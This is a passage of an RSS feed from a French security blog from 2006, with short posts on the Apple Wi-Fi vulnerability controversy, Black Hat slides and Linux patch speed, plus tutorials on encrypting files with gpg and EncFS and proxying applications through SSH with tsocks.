&lt;p&gt;&lt;a href=&quot;http://lists.immunitysec.com/pipermail/dailydave/2006-September/003459.html&quot;&gt;Quelques éclaicissements de Johnny Cache&lt;/a&gt; (sur son silence et &lt;a href=&quot;http://www.802.11mercenary.net/&quot;&gt;ses compétences&lt;/a&gt;)&lt;br /&gt;
&lt;br /&gt;&lt;/p&gt;


&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;September 19&lt;/strong&gt;, 2006&lt;br /&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Coïncidence, plein de patchs Apple..&lt;br /&gt;
&lt;a href=&quot;http://docs.info.apple.com/article.html?artnum=304420&quot;&gt;Security content of AirPort Update 2006-001 and Security Update 2006-005&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;&lt;/p&gt;


&lt;ul&gt;
&lt;li&gt;2006-&lt;strong&gt;09-19&lt;/strong&gt;&lt;br /&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Coïncidence, le même jour, de nouvelles infos de David Maynor..&lt;br /&gt;
&lt;a href=&quot;http://www.securityfocus.com/infocus/1877&quot;&gt;Beginner's guide to wireless auditing by David Maynor&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;&lt;/p&gt;


&lt;ul&gt;
&lt;li&gt;2006-&lt;strong&gt;09-21&lt;/strong&gt;&lt;br /&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Apple dément le lien entre les auteurs de la video, et leurs patchs.&lt;br /&gt;
&lt;a href=&quot;http://www.securityfocus.com/brief/311&quot;&gt;Apple wireless vulnerable after all&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;&lt;/p&gt;


&lt;p&gt;A suivre...&lt;/p&gt;



&lt;p&gt;Dans tous les cas, un gros coup de pub pour Secureworks qui est:&lt;br /&gt;
Named to &lt;a href=&quot;http://www.secureworks.com/press/20060905-inc.html&quot;&gt;&quot;the Inc. 500 List of Fastest Growing Private Companies&lt;/a&gt;  for Second Year Running&quot; :)&lt;/p&gt;</description>
    
    
    
          <comments>http://blog.uggy.org/post/2006/09/26/116-video-blackhat-et-securite-wifi#comment-form</comments>
      <wfw:comment>http://blog.uggy.org/post/2006/09/26/116-video-blackhat-et-securite-wifi#comment-form</wfw:comment>
      <wfw:commentRss>http://blog.uggy.org/feed/rss2/comments/109</wfw:commentRss>
      </item>
    
  <item>
    <title>Présentations Black Hat USA 2006</title>
    <link>http://blog.uggy.org/post/2006/08/10/110-presentations-black-hat-2006</link>
    <guid isPermaLink="false">urn:md5:37e04c4bff6c0422171cb14086f69a09</guid>
    <pubDate>Thu, 10 Aug 2006 22:44:30 +0000</pubDate>
    <dc:creator>Yannick</dc:creator>
        <category>Sécu</category>
            
    <description>    &lt;blockquote&gt;&lt;p&gt;mkdir bh2006 &amp;amp;&amp;amp; cd bh2006 &amp;amp;&amp;amp; for i in `wget -O - -q http://164.106.251.250/docs/bh2006/ |grep pdf |cut -d= -f4|cut -d\&amp;gt; -f1 |cut -d\&quot; -f2`&amp;nbsp;; do wget http://164.106.251.250/docs/bh2006/$i; done&lt;/p&gt;&lt;/blockquote&gt;</description>
    
    
    
          <comments>http://blog.uggy.org/post/2006/08/10/110-presentations-black-hat-2006#comment-form</comments>
      <wfw:comment>http://blog.uggy.org/post/2006/08/10/110-presentations-black-hat-2006#comment-form</wfw:comment>
      <wfw:commentRss>http://blog.uggy.org/feed/rss2/comments/31</wfw:commentRss>
      </item>
    
  <item>
    <title>Comparatif de réactivité de sortie des correctifs de différentes distributions Linux</title>
    <link>http://blog.uggy.org/post/2006/08/05/109-comparatif-de-reactivite-de-sortie-des-correctifs-de-differentes-distributions-linux</link>
    <guid isPermaLink="false">urn:md5:0588b22b6eb80a37e07d383f8bbc2e72</guid>
    <pubDate>Sat, 05 Aug 2006 00:58:42 +0000</pubDate>
    <dc:creator>Yannick</dc:creator>
        <category>Sécu</category>
            
    <description>    &lt;p&gt;&lt;a href=&quot;http://searchsecurity.techtarget.com/originalContent/0,289142,sid14_gci1202417,00.html&quot;&gt;Cet article&lt;/a&gt; présente un classement des distributions les plus rapides à sortir les correctifs de sécurité, en attribuant des notes de réactivité sur une trentaine de failles sorties ces 6 derniers mois...&lt;/p&gt;


&lt;p&gt;1- Ubuntu&lt;br /&gt;
2- Fedora Core&lt;br /&gt;
3- RedHat EL&lt;br /&gt;
4- Debian&lt;br /&gt;
....&lt;/p&gt;


&lt;p&gt;A noter que certaines distribs veulent peut être vérifier plus attentivement la vulnérabilité et/ou le correctif avant de le releaser...&lt;/p&gt;


&lt;p&gt;Via &lt;a href=&quot;http://fridge.ubuntu.com&quot;&gt;The Fridge&lt;/a&gt;&lt;/p&gt;</description>
    
    
    
          <comments>http://blog.uggy.org/post/2006/08/05/109-comparatif-de-reactivite-de-sortie-des-correctifs-de-differentes-distributions-linux#comment-form</comments>
      <wfw:comment>http://blog.uggy.org/post/2006/08/05/109-comparatif-de-reactivite-de-sortie-des-correctifs-de-differentes-distributions-linux#comment-form</wfw:comment>
      <wfw:commentRss>http://blog.uggy.org/feed/rss2/comments/107</wfw:commentRss>
      </item>
    
  <item>
    <title>Video SSTIC 2006 de nikoteen</title>
    <link>http://blog.uggy.org/post/2006/06/15/96-video-sstic-2006-de-nikoteen</link>
    <guid isPermaLink="false">urn:md5:c621399ffa1fdc6f7c99816c1722ff23</guid>
    <pubDate>Thu, 15 Jun 2006 00:33:25 +0000</pubDate>
    <dc:creator>Yannick</dc:creator>
        <category>Sécu</category>
            
    <description>    &lt;p&gt;Je n'ai pas de catégorie humour alors je le met en &quot;Sécu&quot;&lt;/p&gt;


&lt;p&gt;Extrait SSTIC 2006 -  Réalisé par nikoteen - (Qualité appareil photo)&lt;/p&gt;


&lt;p&gt;http://zetetique.info/sstic06-nikoteen.avi&lt;br /&gt;
ou mirroir sur:&lt;br /&gt;
http://sid.rstack.org/videos/confs/0506_SSTIC_Nikoteen.avi&lt;/p&gt;


&lt;p&gt;...trop bon... :)&lt;/p&gt;</description>
    
    
    
          <comments>http://blog.uggy.org/post/2006/06/15/96-video-sstic-2006-de-nikoteen#comment-form</comments>
      <wfw:comment>http://blog.uggy.org/post/2006/06/15/96-video-sstic-2006-de-nikoteen#comment-form</wfw:comment>
      <wfw:commentRss>http://blog.uggy.org/feed/rss2/comments/88</wfw:commentRss>
      </item>
    
  <item>
    <title>Chiffrer en symétrique avec gpg</title>
    <link>http://blog.uggy.org/post/2006/05/28/95-chiffrer-en-symetrique-avec-gpg</link>
    <guid isPermaLink="false">urn:md5:a5bb54851461350064a4328d32b15f93</guid>
    <pubDate>Sun, 28 May 2006 03:12:15 +0000</pubDate>
    <dc:creator>Yannick</dc:creator>
        <category>Sécu</category>
            
    <description>    &lt;ul&gt;
&lt;li&gt;Introduction&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;J'ai régulièrement besoin d'envoyer des fichiers chiffrés à des correspondants qui répondent aux critères suivant:&lt;br /&gt;
- Ils sont sous Windows&lt;br /&gt;
- Ils sont &quot;néophites&quot; et il n'est pas question d'essayer de leur faire générer (en plus de l'installation d'un logiciel) des bi-clés asymétriques.&lt;br /&gt;&lt;/p&gt;


&lt;p&gt;Cela requiert l'utilisation d'un logiciel qui:&lt;br /&gt;
-soit gratuit (et facilement installable)&lt;br /&gt;
-puisse être utilisé sur (mon) Linux pour chiffrer le fichier, et sur leur Windows pour le déchiffrer&lt;br /&gt;
-puisse chiffrer/déchiffrer en &lt;strong&gt;symétrique&lt;/strong&gt; pour simplifier au maximum la procédure.&lt;/p&gt;


&lt;p&gt;Pour cela on peut utiliser gpg (avec l'option -c pour chiffrer en symétrique)&lt;/p&gt;


&lt;blockquote&gt;&lt;p&gt;gpg -- encryption and signing tool&lt;/p&gt;&lt;/blockquote&gt;


&lt;blockquote&gt;&lt;p&gt;-c, --symmetric  &lt;br /&gt;
Encrypt with a symmetric cipher using a passphrase.&lt;/p&gt;&lt;/blockquote&gt;

&lt;ul&gt;
&lt;li&gt;Exemple de chiffrement&lt;/li&gt;
&lt;/ul&gt;

&lt;blockquote&gt;&lt;p&gt;[yannick@yop /tmp] echo totootototot &amp;gt; toto&lt;br /&gt;
[yannick@yop /tmp] gpg -c --cipher-algo=AES256 toto&lt;br /&gt;
Enter passphrase:&lt;br /&gt;
Repeat passphrase: &lt;br /&gt;
[yannick@yop /tmp] ls toto*&lt;br /&gt;
toto  toto.gpg&lt;br /&gt;
[yannick@yop /tmp] &lt;br /&gt;
[yannick@yop /tmp] rm toto&lt;br /&gt;
[yannick@yop /tmp] cat toto.gpg &lt;br /&gt;
è¼÷-$+q`Ò?ëfW³¿1ð. Ð[&amp;lt;ï c&amp;lt;&lt;br /&gt;
æ$ïÉÈßN(^·®?ÙYÏ·°èáì=v/ûwc4#Ð-F!}|Tó[yannick@yop /tmp] &lt;br /&gt;&lt;/p&gt;&lt;/blockquote&gt;

&lt;ul&gt;
&lt;li&gt;Exemple de déchiffrement sous linux&lt;/li&gt;
&lt;/ul&gt;

&lt;blockquote&gt;&lt;p&gt;[yannick@yop /tmp] gpg toto.gpg&lt;br /&gt;
gpg: AES256 encrypted data&lt;br /&gt;
Enter passphrase: &lt;br /&gt;
gpg: encrypted with 1 passphrase&lt;br /&gt;
[yannick@yop /tmp] &lt;br /&gt;
[yannick@yop /tmp] ls toto*&lt;br /&gt;
toto  toto.gpg&lt;br /&gt;
[yannick@yop /tmp] cat toto&lt;br /&gt;
totootototot&lt;br /&gt;
[yannick@yop /tmp] &lt;br /&gt;&lt;/p&gt;&lt;/blockquote&gt;

&lt;ul&gt;
&lt;li&gt;Exemple de déchiffrement sous Windows&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;À l'écriture de ce billet, la dernière version de binaire Windows est ici:&lt;br /&gt;
&lt;a href=&quot;ftp://ftp.gnupg.org/gcrypt/binary/gnupg-w32cli-1.4.3.exe&quot;&gt;ftp://ftp.gnupg.org/gcrypt/binary/gnupg-w32cli-1.4.3.exe&lt;/a&gt;&lt;/p&gt;


&lt;blockquote&gt;&lt;p&gt;Microsoft Windows XP [version 1.2.3400]&lt;br /&gt;
(C) Copyright 1785-2032 Microsoft Corp.&lt;br /&gt;&lt;/p&gt;
&lt;p&gt;
C:\Documents and Settings\Administrateur&amp;gt;more c:\toto.gpg&lt;br /&gt;
???Þ?+¸-$+q`Ê??ÙfÜW¦+?1­.áð[&amp;lt;´ c&amp;lt;?µ$´++¯N(^À«?+Y¤éÀ?¦Þßý=v/¹wc4#ð-òF!ò}ì|T¾&lt;br /&gt;&lt;/p&gt;
&lt;p&gt;
C:\Documents and Settings\Administrateur&amp;gt;&lt;br /&gt;
C:\Documents and Settings\Administrateur&amp;gt;gpg c:\toto.gpg&lt;br /&gt;
gpg: AES256 encrypted data&lt;br /&gt;
Enter passphrase:&lt;br /&gt;
gpg: encrypted with 1 passphrase&lt;br /&gt;&lt;/p&gt;
&lt;p&gt;
C:\Documents and Settings\Administrateur&amp;gt;&lt;br /&gt;
C:\Documents and Settings\Administrateur&amp;gt;dir c:\toto*&lt;br /&gt;
Le volume dans le lecteur C n'a pas de nom.&lt;br /&gt;
Le numéro de série du volume est 1234-1234&lt;br /&gt;
Répertoire de c:\&lt;/p&gt;
&lt;p&gt;
28/05/2006  02:58                80 toto.gpg&lt;br /&gt;
28/05/2006  03:20                13 toto&lt;br /&gt;
2 fichier(s)               93 octets&lt;br /&gt;
0 Rép(s)   7 583 334 400 octets libres&lt;br /&gt;
C:\Documents and Settings\Administrateur&amp;gt;&lt;br /&gt;
C:\Documents and Settings\Administrateur&amp;gt;more c:\toto&lt;br /&gt;
totootototot&lt;br /&gt;&lt;/p&gt;
&lt;p&gt;
C:\Documents and Settings\Administrateur&amp;gt;&lt;br /&gt;&lt;/p&gt;&lt;/blockquote&gt;


&lt;ul&gt;
&lt;li&gt;Installation sous Windows&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;C'est du &quot;Next, Next, Finish&quot;, mais on peut toujour envoyer un petit pdf explicatif au correspondant pour l'aider...&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;A faire&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Il pourrait être sympa d'avoir un script (script nautilus pas exemple) qui chiffre un fichier et qui le met automatiquement dans un zip auto-extractible qui contient déja gpg.exe et qui lançe automatiquement un .bat qui cherche à déchiffrer le fichier en question... ce qui ferait que le destinataire n'aurait même pas a installer gpg....&lt;br /&gt;
Si ça interresse une une bonne âme (parceque j'ai pas trouvé pour Linux?) ;)&lt;/p&gt;</description>
    
    
    
          <comments>http://blog.uggy.org/post/2006/05/28/95-chiffrer-en-symetrique-avec-gpg#comment-form</comments>
      <wfw:comment>http://blog.uggy.org/post/2006/05/28/95-chiffrer-en-symetrique-avec-gpg#comment-form</wfw:comment>
      <wfw:commentRss>http://blog.uggy.org/feed/rss2/comments/96</wfw:commentRss>
      </item>
    
  <item>
    <title>Final Release - BackTrack v.1.0 is available</title>
    <link>http://blog.uggy.org/post/2006/05/27/94-final-release-backtrack-v10-is-available</link>
    <guid isPermaLink="false">urn:md5:82c59ac1b97675b71490444c34968ec4</guid>
    <pubDate>Sat, 27 May 2006 01:43:50 +0000</pubDate>
    <dc:creator>Yannick</dc:creator>
        <category>Sécu</category>
            
    <description>    &lt;p&gt;Backtrack désormais en version &quot;v.1.0 Final&quot;...&lt;/p&gt;


&lt;p&gt;&lt;a href=&quot;http://www.remote-exploit.org/index.php/BackTrack_Downloads&quot;&gt;http://www.remote-exploit.org/index.php/BackTrack_Downloads&lt;/a&gt;&lt;/p&gt;


&lt;p&gt;&lt;a href=&quot;http://blog.uggy.org/index.php?2006/02/05/72-livecd-secu-whax-et-auditor-fusionnent-pour-devenir-backtrack&quot;&gt;Mon précédent billet&lt;/a&gt;&lt;/p&gt;</description>
    
    
    
          <comments>http://blog.uggy.org/post/2006/05/27/94-final-release-backtrack-v10-is-available#comment-form</comments>
      <wfw:comment>http://blog.uggy.org/post/2006/05/27/94-final-release-backtrack-v10-is-available#comment-form</wfw:comment>
      <wfw:commentRss>http://blog.uggy.org/feed/rss2/comments/95</wfw:commentRss>
      </item>
    
  <item>
    <title>Chiffrer ses données avec EncFS</title>
    <link>http://blog.uggy.org/post/2006/05/17/90-chiffrer-ses-donnees-avec-encfs</link>
    <guid isPermaLink="false">urn:md5:1bfa84d7a40abf16fae52ea9ecfb68b2</guid>
    <pubDate>Wed, 17 May 2006 12:07:47 +0000</pubDate>
    <dc:creator>Yannick</dc:creator>
        <category>Sécu</category>
            
    <description>&lt;ul&gt;
&lt;li&gt;Introduction&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href=&quot;http://arg0.net/wiki/encfs&quot;&gt;EncFS&lt;/a&gt; permet de chiffrer très simplement des données.&lt;br /&gt;
En gros, 2 répertoires sont utilisés:&lt;br /&gt;
- le répertoire dans lequel sont stoquées les données chiffrées.&lt;br /&gt;
- le répertoire dans lequel on monte les données en clair pour y accéder.&lt;/p&gt;    &lt;ul&gt;
&lt;li&gt;Installation&lt;/li&gt;
&lt;/ul&gt;

&lt;blockquote&gt;&lt;p&gt;sudo apt-get install encfs fuse-utils&lt;/p&gt;&lt;/blockquote&gt;


&lt;p&gt;Charger tout de suite le module fuse avec:&lt;/p&gt;


&lt;blockquote&gt;&lt;p&gt;sudo modprobe fuse&lt;/p&gt;&lt;/blockquote&gt;


&lt;p&gt;Activer le chargement au démarrage en ajoutant fuse dans le fichier /etc/modules&lt;/p&gt;


&lt;p&gt;Ajouter l'utilisateur au groupe fuse avec:&lt;/p&gt;


&lt;blockquote&gt;&lt;p&gt;sudo adduser &amp;lt;NomUser&amp;gt; fuse&lt;/p&gt;&lt;/blockquote&gt;


&lt;p&gt;puis réouvrir une session avec&lt;/p&gt;


&lt;blockquote&gt;&lt;p&gt;su - &amp;lt;user&amp;gt;&lt;/p&gt;&lt;/blockquote&gt;


&lt;p&gt;Vérification par la commande&lt;/p&gt;

&lt;blockquote&gt;&lt;p&gt;groups&lt;/p&gt;&lt;/blockquote&gt;




&lt;ul&gt;
&lt;li&gt;Initialisation&lt;/li&gt;
&lt;/ul&gt;

&lt;blockquote&gt;&lt;p&gt;encfs /home/yannick/.crypt/ /home/yannick/crypt/&lt;/p&gt;&lt;/blockquote&gt;


&lt;p&gt;Cette commande permet la 1ère fois qu'elle est lancée de tout paramétrer pour stoquer les données chiffrées dans le répertoire .crypt/  et de monter les données en clair dans le répertoire crypt/    ...Tout ceci avec le mot de passe demandé, et avec l'algo choisi:&lt;br /&gt;
A noter qu'il est nécessaire d'indiquer des chemins complets&amp;nbsp;!&lt;/p&gt;



&lt;blockquote&gt;&lt;p&gt;[yannick@yop ~] encfs /home/yannick/.crypt/ /home/yannick/crypt&lt;br /&gt;
The directory &quot;/home/yannick/.crypt/&quot; does not exist. Should it be created? (y,n) y&lt;br /&gt;
The directory &quot;/home/yannick/crypt&quot; does not exist. Should it be created? (y,n) y&lt;br /&gt;
Création d'un nouveau volume chiffré.&lt;br /&gt;
Veuillez choisir au moins une des options suivantes :&lt;br /&gt;
entrez &quot;x&quot; pour le mode de configuration expert,&lt;br /&gt;
entrez &quot;p&quot; pour un mode pré-configuré paranoïaque,&lt;br /&gt;
n'importe quoi d'autre ou une ligne vide sélectionnera le mode standard.&lt;br /&gt;
?&amp;gt; p&lt;br /&gt;
&lt;br /&gt;
Configuration paranoïaque sélectionnée.&lt;br /&gt;
&lt;br /&gt;
Configuration terminée. Le système de fichiers sur le&lt;br /&gt;
point d'être créé a les caractéristiques suivantes :&lt;br /&gt;
Chiffrement de système de fichiers &quot;ssl/aes&quot;, version 2:1:1&lt;br /&gt;
Encodage du nom de fichier&amp;nbsp;: &quot;nameio/block&quot;, version 3:0:1&lt;br /&gt;
Taille de clé&amp;nbsp;: 256 bits&lt;br /&gt;
Taille de bloc&amp;nbsp;: 512 octets, y compris 8 octets d'en-tête MAC&lt;br /&gt;
Chaque fichier comprend un en-tête de 8 octets avec des données IV uniques.&lt;br /&gt;
Nom de fichiers chiffrés en utilisant le mode de chaînage IV.&lt;br /&gt;
L'IV des données du fichier est chaînée à l'IV du nom de fichier.&lt;br /&gt;
&lt;br /&gt;
Vous allez maintenant devoir entrer un mot de passe&lt;br /&gt;
pour votre système de fichiers.&lt;br /&gt;
Vous allez devoir absolument vous souvenir de ce mot de passe,&lt;br /&gt;
comme il n'y a aucun mécanisme de secours.&lt;br /&gt;
Cependant, le mot de passe pourra être changé plus tard&lt;br /&gt;
en utilisant encfsctl.&lt;br /&gt;
&lt;br /&gt;
Nouveau mot de passe EncFS:  &lt;br /&gt;
Vérifiez le mot de passe EncFS: &lt;br /&gt;
[yannick@yop ~]&lt;/p&gt;&lt;/blockquote&gt;


&lt;ul&gt;
&lt;li&gt;Utilisation&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Pour ne plus pouvoir accéder au données en clair, il suffit de démonter le répertoire:&lt;br /&gt;&lt;/p&gt;


&lt;blockquote&gt;&lt;p&gt;fusermount -u /home/yannick/crypt&lt;/p&gt;&lt;/blockquote&gt;



&lt;p&gt;Pour accéder au données en clair, il suffit de réutiliser la même commande qu'au début.&lt;br /&gt;
(Maintenant EncFS voit qu'une initialisation a déja été faite sur ces répertoires et ne redemande plus de choisir un nouveau mot de passe ou de choix d'algo)&lt;br /&gt;
(Il demande simplement le mot de passe choisi à l'étape précédente).&lt;/p&gt;


&lt;blockquote&gt;&lt;p&gt;encfs /home/yannick/.crypt/ /home/yannick/crypt/&lt;/p&gt;&lt;/blockquote&gt;


&lt;p&gt;Toute donnée copiée (en clair donc) dans le répertoire crypt/ sera automatiquement stoquée chiffrée dans  .crypt/&lt;/p&gt;


&lt;ul&gt;
&lt;li&gt;Exemple&lt;/li&gt;
&lt;/ul&gt;


&lt;blockquote&gt;&lt;p&gt;[yannick@yop ~] echo tutu &amp;gt; crypt/toto&lt;br /&gt;
&lt;br /&gt;
[yannick@yop ~] ll crypt&lt;br /&gt;
total 20K&lt;br /&gt;
drwx------    2 yannick yannick 4,0K 2006-05-15 17:39 .&lt;br /&gt;
drwxr-xr-x  154 yannick yannick 8,0K 2006-05-15 17:02 ..&lt;br /&gt;
-rw-r--r--    1 yannick yannick    5 2006-05-15 17:39 toto&lt;br /&gt;
[yannick@yop ~] &lt;br /&gt;
[yannick@yop ~] ll .crypt/&lt;br /&gt;
total 24K&lt;br /&gt;
drwx------    2 yannick yannick 4,0K 2006-05-15 17:39 .&lt;br /&gt;
drwxr-xr-x  154 yannick yannick 8,0K 2006-05-15 17:02 ..&lt;br /&gt;
-rw-r-----    1 yannick yannick  239 2006-05-15 17:01 .encfs5&lt;br /&gt;
-rw-r--r--    1 yannick yannick   21 2006-05-15 17:39 kFt9KLjUCdpWHJfyabKjfD0k&lt;br /&gt;
&lt;br /&gt;
[yannick@yop ~] cat .crypt/kFt9KLjUCdpWHJfyabKjfD0k&lt;br /&gt;
i¥Æ1ýúð&lt;br /&gt;
ã?DmDNò7ó[yannick@yop ~] &lt;br /&gt;
[yannick@yop ~] &lt;br /&gt;
[yannick@yop ~] fusermount -u crypt&lt;br /&gt;
[yannick@yop ~] ll crypt&lt;br /&gt;
total 16K&lt;br /&gt;
drwx------    2 yannick yannick 4,0K 2006-05-15 17:00 .&lt;br /&gt;
drwxr-xr-x  154 yannick yannick 8,0K 2006-05-15 17:02 ..&lt;br /&gt;
[yannick@yop ~]&lt;/p&gt;&lt;/blockquote&gt;


&lt;ul&gt;
&lt;li&gt;Conclusion/Divers&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Il existe beaucoup d'autres méthodes pour chiffrer les données sous Linux, mais celle ci a, je trouve, le plus d'avantages.&lt;/p&gt;


&lt;p&gt;Cette méthode ne nécessite pas par exemple, de créer un fichier d'une taille définie dédiée à l'espace chiffré...par contre on peut voir le nombre de fichiers chiffrés , leur taille, leurs droits ... ceci étant un avantage lors de l'utilisation de backups incrémentaux par exemple...&lt;/p&gt;


&lt;p&gt;Les performances semblent correctes (crontrairement à d'autres solutions)..&lt;br /&gt;
J'ai fait un test de lecture de divx par exemple... je n'ai noté aucun ralentissement...&lt;/p&gt;


&lt;p&gt;Dans le cas ou le module fuse n'est pas trouvé au moment du chargement, il se peut qu'il faille modifier le noyau (cas de ma sarge en 2.4).&lt;br /&gt;
Dans ce cas faire un:&lt;br /&gt;&lt;/p&gt;

&lt;blockquote&gt;&lt;p&gt;sudo apt-get install module-assistant&lt;br /&gt;
sudo module-assistant...&lt;br /&gt;&lt;/p&gt;&lt;/blockquote&gt;

&lt;p&gt;puis &quot;prepare&quot;, puis &quot;select&quot;, puis &quot;fuse&quot;, puis &quot;build&quot;, puis faire &quot;enter&quot; au moment du &quot;The source package may not be installed...&quot;, puis &quot;exit...&lt;br /&gt;
...et la le &quot;modprobe fuse&quot; devrait être ok...&lt;/p&gt;


&lt;p&gt;Ne pas hésiter à utiliser des alias pour simplifier le montage et le démontage...&lt;/p&gt;


&lt;p&gt;Pour pouvoir accéder au données en clair, est nécessaire en plus du mot de passe de bien avoir le fichier .encfs5 à la racine du répertoire chiffré...&lt;/p&gt;


&lt;p&gt;Cette &lt;a href=&quot;http://arg0.net/wiki/encfs/intro2&quot;&gt;autre page&lt;/a&gt; est interressante à lire en plus du &lt;a href=&quot;http://arg0.net/users/vgough/encfs-man.html&quot;&gt;man&lt;/a&gt;...&lt;/p&gt;


&lt;p&gt;Bref... une installation en 3/4 commandes, une utilisation en 2 commandes... çà serait vraiment dommage de ne pas en profiter surtout sur un PC portable où les données sont particulièrement exposées...&lt;/p&gt;



&lt;p&gt;PS: Suite à un commentaire de Totologie, il est a noter que les liens (hard) ne peuvent pas etre copiés dans le répertoire chiffré en mode &quot;paranoiaque&quot;. (Pour plus d'infos, voir les commentaires)&lt;/p&gt;


&lt;p&gt;EDIT:  Ajout de ce billet sur l&lt;a href=&quot;http://doc.ubuntu-fr.org/securite/repertoire_chiffre_avec_encfs&quot;&gt;e Wiki d'Ubuntu-fr&lt;/a&gt;&lt;/p&gt;</description>
    
    
    
          <comments>http://blog.uggy.org/post/2006/05/17/90-chiffrer-ses-donnees-avec-encfs#comment-form</comments>
      <wfw:comment>http://blog.uggy.org/post/2006/05/17/90-chiffrer-ses-donnees-avec-encfs#comment-form</wfw:comment>
      <wfw:commentRss>http://blog.uggy.org/feed/rss2/comments/91</wfw:commentRss>
      </item>
    
  <item>
    <title>tsock - pour tout rendre compatible Socks !</title>
    <link>http://blog.uggy.org/post/2006/04/22/87-tsock-pour-tout-rendre-compatible-socks</link>
    <guid isPermaLink="false">urn:md5:f1af2f07e4ad7fdd7fc6ab36bfc4b133</guid>
    <pubDate>Sat, 22 Apr 2006 16:07:14 +0000</pubDate>
    <dc:creator>Yannick</dc:creator>
        <category>Sécu</category>
            
    <description>    &lt;ul&gt;
&lt;li&gt;Introduction&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href=&quot;http://tsocks.sourceforge.net/&quot;&gt;tsocks&lt;/a&gt;  permet en gros, de faire passer par un proxy Socks, des applications qui nativement ne le permettent pas. Il permet donc, par exemple, de faire passer une appli par le proxy Socks d'OpenSSH et donc de chiffrer les données...(voir billet précédent).&lt;/p&gt;



&lt;blockquote&gt;&lt;p&gt;tsocks' role is to allow these non SOCKS aware applications (e.g telnet, ssh, ftp etc) to use SOCKS without any modification. It does this by intercepting the calls that applications make to establish network connections and negotating them through a SOCKS server as necessary.&lt;/p&gt;&lt;/blockquote&gt;


&lt;ul&gt;
&lt;li&gt;Installation&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Sous Debian/Ubuntu un simple:&lt;/p&gt;


&lt;blockquote&gt;&lt;p&gt;sudo apt-get install tsocks&lt;/p&gt;&lt;/blockquote&gt;


&lt;ul&gt;
&lt;li&gt;Les fichiers principaux:&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Le fichier de conf /etc/tsocks.conf&lt;br /&gt;
Le binaire /usr/bin/tsocks&lt;br /&gt;
La librairie /usr/lib/libtsocks.so&lt;br /&gt;&lt;/p&gt;


&lt;ul&gt;
&lt;li&gt;Configuration:&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Modifier le fichier /etc/tsocks.conf&lt;br /&gt;
Il permet d'indiquer:&lt;br /&gt;
-les réseaux qui accéderont sans proxy Socks&lt;br /&gt;
-les proxy socks à utiliser en fonctions des réseaux à accéder&lt;br /&gt;
-le proxy socks par défaut&lt;br /&gt;&lt;/p&gt;


&lt;p&gt;Dans le cas d'utilisation d'un proxy Socks lancé localement par OpenSSH sur le port 1234, la configuration de tsocks sera du type:&lt;br /&gt;
server = 127.0.0.1 &lt;br /&gt;
server_port = 1234 &lt;br /&gt;
server_type = 5&lt;br /&gt;&lt;/p&gt;


&lt;ul&gt;
&lt;li&gt;Utilisation&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;- Soit on envoi directement toutes les applis lançées dans ce shell vers tsocks (et donc à travers le tunnel SSH dans notre cas) avec:&lt;br /&gt;&lt;/p&gt;

&lt;blockquote&gt;&lt;p&gt;source tsocks -on&lt;br /&gt;
source tsocks -off&lt;br /&gt;&lt;/p&gt;&lt;/blockquote&gt;


&lt;p&gt;On peut voir si la librairie est chargée avec:&lt;br /&gt;
[yannick@yop ~] env |grep LD_PRELOAD&lt;br /&gt;
ou&lt;br /&gt;
[yannick@yop ~] source tsocks -show&lt;br /&gt;
LD_PRELOAD=&quot;/usr/lib/libtsocks.so&quot;&lt;br /&gt;&lt;/p&gt;



&lt;p&gt;- Soit on envoit les applis &quot;une par une&quot; vers tsocks (et donc le tunnel OpenSSH) avec:&lt;br /&gt;&lt;/p&gt;

&lt;blockquote&gt;&lt;p&gt;tsocks &amp;lt;NomAppli&amp;gt;&lt;/p&gt;&lt;/blockquote&gt;



&lt;p&gt;exemples:&lt;/p&gt;


&lt;blockquote&gt;&lt;p&gt;[yannick@yop ~] tsocks liferea &amp;amp;&lt;br /&gt;&lt;/p&gt;&lt;/blockquote&gt;


&lt;p&gt;On peut vérifier avec quelquechose comme:&lt;br /&gt;&lt;/p&gt;

&lt;blockquote&gt;&lt;p&gt;[yannick@yop ~] wget -O - -q http://www.whatismyip.org&lt;br /&gt;
&lt;strong&gt;1.1.1.1&lt;/strong&gt;&lt;br /&gt;
[yannick@yop ~] tsocks wget -O - -q http://www.whatismyip.org&lt;br /&gt;
&lt;strong&gt;2.2.2.2&lt;/strong&gt;&lt;br /&gt;
[yannick@yop ~]&lt;/p&gt;&lt;/blockquote&gt;


&lt;ul&gt;
&lt;li&gt;Conclusion:&lt;br /&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Ce type de connexion (appli -&amp;gt; [tsocks -&amp;gt; OpenSSH]-&amp;gt; ressource ) peut permettre aussi bien de &quot;sortir&quot; d'un réseau &quot;non sûr&quot; (Accès Wifi...)en passant par son Pc perso par exemple, que d'accéder de l'extérieur aux ressources &quot;internes&quot; d'un réseau d'entreprise...&lt;/p&gt;</description>
    
    
    
          <comments>http://blog.uggy.org/post/2006/04/22/87-tsock-pour-tout-rendre-compatible-socks#comment-form</comments>
      <wfw:comment>http://blog.uggy.org/post/2006/04/22/87-tsock-pour-tout-rendre-compatible-socks#comment-form</wfw:comment>
      <wfw:commentRss>http://blog.uggy.org/feed/rss2/comments/87</wfw:commentRss>
      </item>
    
  <item>
    <title>Tunnel SSH avec l'option -D</title>
    <link>http://blog.uggy.org/post/2006/04/22/86-tunnel-ssh-avec-l-option-d</link>
    <guid isPermaLink="false">urn:md5:f582b8a7c12d0e11c693d99a251705ab</guid>
    <pubDate>Sat, 22 Apr 2006 15:42:00 +0000</pubDate>
